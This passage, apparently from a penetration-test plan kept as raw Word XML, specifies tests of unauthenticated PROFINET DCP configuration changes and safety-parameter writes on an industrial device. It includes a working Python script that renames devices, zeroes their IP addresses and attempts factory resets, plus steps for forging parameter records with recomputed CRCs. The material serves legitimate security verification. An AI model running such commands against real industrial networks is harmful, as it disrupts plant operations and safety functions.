                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Empirically determine whether a peer node on the OT segment can issue a DCP Set / Reset-to-Factory (Mode 2, mandatory; 3/4 if present) and thereby reset the device's communication configuration (NameOfStation, IP), without any credential and without touching the physical switch barrier, demonstrating that a connection-relevant setting can be modified by an unauthorized third party.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="1088752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E3B0933" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="548DF030" w14:textId="77777777" w:rsidR="00632753" w:rsidRPr="006E4D50" w:rsidRDefault="00632753"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1. Baseline NameOfStation/IP and operating state. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A57D0CF" w14:textId="77777777" w:rsidR="00632753" w:rsidRPr="006E4D50" w:rsidRDefault="00632753"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2. From the Pi, issue a DCP Identify, then a DCP Set (change NameOfStation/IP) and a DCP Reset-to-Factory. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EA67ACF" w14:textId="77777777" w:rsidR="00632753" w:rsidRPr="006E4D50" w:rsidRDefault="00632753"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3. Observe whether the actions succeed without authentication. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A08B384" w14:textId="77777777" w:rsidR="00632753" w:rsidRPr="006E4D50" w:rsidRDefault="00632753"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lastRenderedPageBreak/>
              <w:t xml:space="preserve">4. Observe the safety impact (loss of PROFIsafe connection → passivation). </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="29DCA3E6" w14:textId="13C224C1" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00632753" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5. Attempt higher reset modes if supported.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="2B09497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029D99" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7484EA21" w14:textId="77777777" w:rsidR="004936A2" w:rsidRPr="006E4D50" w:rsidRDefault="004936A2" w:rsidP="004936A2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2865"/>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PASS against the requirement if DCP set/reset requires authentication or is refused from an unauthorized node. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0E4DE9DB" w14:textId="77777777" w:rsidR="001E44C1" w:rsidRPr="006E4D50" w:rsidRDefault="004936A2" w:rsidP="004936A2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2865"/>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Expected = FAIL: the reset succeeds unauthenticated (corroborated by SRIO-3029 "…at any time")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2564E747" w14:textId="142C9B49" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="004936A2" w:rsidP="004936A2">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2865"/>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 Record the bound: it affects comm parameters (→ passivation), not silent safety-iPar modification.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1E541653" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00233097" w:rsidP="00233097">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AE93B8E" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00233097">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233097" w14:paraId="37D811E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9E826B" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5BFDEF74" w14:textId="77777777" w:rsidR="0023309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233097" w14:paraId="3EB01FC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33AB46" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Ref. Test Case</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="143E8CE6" w14:textId="12119499" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="002373D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TC-RQ011-02</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00F15AEA" w14:paraId="011301A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5BF24E8" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>HW/Network</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4ACF33B1" w14:textId="77777777" w:rsidR="00230372" w:rsidRPr="006E4D50" w:rsidRDefault="00230372" w:rsidP="00230372">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1633"/>
              </w:tabs>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Pi eth0 = 192.168.0.100 (OT segment, peer node); </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16295CE5" w14:textId="77777777" w:rsidR="00230372" w:rsidRPr="006E4D50" w:rsidRDefault="00230372" w:rsidP="00230372">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1633"/>
              </w:tabs>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DUT 192.168.0.2; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B5D2918" w14:textId="77777777" w:rsidR="00230372" w:rsidRPr="006E4D50" w:rsidRDefault="00230372" w:rsidP="00230372">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1633"/>
              </w:tabs>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SPS 192.168.0.1; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10F77A14" w14:textId="4BDD7EFA" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00230372" w:rsidP="00230372">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="1633"/>
              </w:tabs>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laptop mirror</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="00A1F67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33E3FF" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4EBE9689" w14:textId="08D64F76" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="0015145E" w:rsidP="0015145E">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="216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pnio_dcp (Pi), Wireshark (laptop)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00FD6890" w14:paraId="5B8812F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078EDE6" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Procedure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06E17EC7" w14:textId="77777777" w:rsidR="00E42939"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#!/usr/bin/env python3</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13C93DFC" w14:textId="77777777" w:rsidR="00E42939"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TC-RQ011-02 Unauthenticated DCP set/reset from a peer node (AUTHORIZATION aspect)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2A5BAE09" w14:textId="77777777" w:rsidR="00E42939"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import pnio_dcp</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A305FAC" w14:textId="77777777" w:rsidR="00E42939"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dcp = pnio_dcp.DCP("eth0")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CD2F923" w14:textId="77777777" w:rsidR="00E42939"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for d in dcp.identify_all():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54ACA1A2" w14:textId="77777777" w:rsidR="00E42939"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print("Found:", d.name_of_station, d.MAC, d.IP)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DC1AF98" w14:textId="77777777" w:rsidR="00E42939"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dcp.set_name_of_station(d.MAC, "attacker-renamed") # (1) unauth SET</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0A7A6211" w14:textId="77777777" w:rsidR="00E42939"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dcp.set_ip_address(d.MAC, ["0.0.0.0","0.0.0.0","0.0.0.0"]) # (2) unauth SET IP</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1410E5CB" w14:textId="77777777" w:rsidR="00E42939"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try: dcp.reset_to_factory(d.MAC) # (3) Mode 2 reset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1A4B7304" w14:textId="674C5863" w:rsidR="00233097"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except Exception as e: print("reset attempt:", e)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="59B17C9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4C04D1" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Expected</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1561882A" w14:textId="42DF3E2B" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00DF3B4D" w:rsidP="00DF3B4D">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="2910"/>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Set/reset accepted without credential (SRIO-3029/3030/7772); PROFIsafe connection drops → device passivates (safe) but comm-config modified by an unauthorized node.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="6EE6987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9066636" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Result</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72FBA584" w14:textId="77777777" w:rsidR="0037689C" w:rsidRPr="006E4D50" w:rsidRDefault="0037689C"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Unauthenticated reset succeeded</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="558BCA8E" w14:textId="3B099DCF" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="0037689C"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6E4D50">
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> Rejected/authenticated </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="24F8DD9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7479EE" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7737" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7C095CE5" w14:textId="77777777" w:rsidR="004D35B4" w:rsidRPr="006E4D50" w:rsidRDefault="004D35B4"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TC1102_dcp.pcapng (mirror), </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E39443C" w14:textId="77777777" w:rsidR="004D35B4" w:rsidRPr="006E4D50" w:rsidRDefault="004D35B4"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Pi console log, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="407043C9" w14:textId="77777777" w:rsidR="004D35B4" w:rsidRPr="006E4D50" w:rsidRDefault="004D35B4"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before/after /fieldbussetup/network/*, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="527671CE" w14:textId="25FB9AD9" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="004D35B4"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passivation trace</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2CEBC5FC" w14:textId="77777777" w:rsidR="00AB13AD" w:rsidRDefault="00AB13AD" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DE96DD4" w14:textId="1FC94202" w:rsidR="00233097" w:rsidRDefault="00224B63" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00483B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">TC-RQ011-03 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00483B71">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Fieldbus Parameter Write Without Device-Side Authorization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D96152" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00233097">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233097" w14:paraId="0B76D1A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77577C" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B6421F0" w14:textId="77777777" w:rsidR="0023309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233097" w14:paraId="2288C37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54AE01" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Test Case ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="13A45620" w14:textId="53A0BB91" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00B37A81" w:rsidP="00B37A81">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3043"/>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TC-RQ011-03</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="0359DE7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3BFB51F" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Traceability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C9460FF" w14:textId="317B0A1A" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00DB2CC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6E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>RQ-011 → CR 1.1 / CR 1.2 / CR 2.1 → Asset B, Asset F</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="7FD10D5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9B96908" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Target Threat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48FF28E7" w14:textId="2EACA099" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="006D4DE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Tampering + Spoofing + Elevation of Privilege</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w14:paraId="56EF5EF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1F8CFBE" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>SVV Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1146747B" w14:textId="2353D608" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="0099472D" w:rsidP="0099472D">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:tabs>
                <w:tab w:val="left" w:pos="3028"/>
              </w:tabs>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SVV-4 (Penetration Testing)</w:t>
            </w:r>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:tab/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="7B2055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1AD9C3" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7920D1DF" w14:textId="08259D48" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="008853D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Demonstrate that the device enforces no credential/authentication of its own on the fieldbus parameter-write path: an unauthorized node presenting a syntactically valid parameter record (correct F_Dest_Add + valid iParCRC/F_ParCRC) during the param phase can write safety parameters</w:t>
            </w:r>
            <w:r w:rsidR="00CA4093" w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="006E4D50">
              <w:rPr>
                <w:color w:val="EE0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>confirming authorization is entirely delegated to the environment (CCSC-2), not device-enforced.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="439CEF2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27D8C63" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B2EFDD2" w14:textId="77777777" w:rsidR="00E11372" w:rsidRPr="006E4D50" w:rsidRDefault="00E11372"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1. Observe the legitimate parametrization sequence. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="429C0804" w14:textId="77777777" w:rsidR="00E11372" w:rsidRPr="006E4D50" w:rsidRDefault="00E11372"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2. From the Pi (impersonating the F-Host or injecting during the param phase), present a modified parameter record with recomputed CRCs. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="457F66F0" w14:textId="24CC09AD" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="00E11372"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3. Determine whether the device demands any authentication before accepting the write.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00233097" w:rsidRPr="00EE7A74" w14:paraId="22576A5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68EE568" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Pass/Fail</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6303C2DC" w14:textId="33B098D2" w:rsidR="00233097" w:rsidRPr="006E4D50" w:rsidRDefault="005B0F6E"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PASS against the requirement if the device requires authentication/authorization before accepting a parameter write. Expected = FAIL: the only checks are addressing + CRC integrity (no credential) → confirms G-1 (authorization delegated, not enforced). Chains to RQ-005 TC-RQ005-02 (valid-CRC forgery), but here the finding is the absence of an authorization credential, not the CRC-forgeability itself.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0E9714C0" w14:textId="77777777" w:rsidR="00233097" w:rsidRPr="00AF57B2" w:rsidRDefault="00233097" w:rsidP="00233097">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5503C35E" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00233097">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233097" w14:paraId="2854EE5D"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6AE124" w14:textId="77777777" w:rsidR="00233097" w:rsidRDefault="00233097" w:rsidP="00655E93">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
